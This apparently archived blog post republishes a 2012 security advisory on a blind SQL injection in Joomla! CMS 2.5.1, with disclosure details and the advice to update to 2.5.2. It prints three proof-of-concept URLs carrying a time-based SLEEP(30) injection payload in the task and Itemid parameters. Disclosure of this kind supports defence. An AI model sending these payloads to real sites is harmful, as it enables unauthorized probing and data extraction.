Sunday, April 29, 2012

Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability

Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.

vulnerability researcher, Sow Ching Shiong has discovered Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Other earlier versions may also be affected.

Proof of concept URLs which will cause a time delay of 30 seconds are provided below:
  • http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
  • http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
  • http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'

Update to version 2.5.2 or later.


Vendor URL:

Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.

1 comment: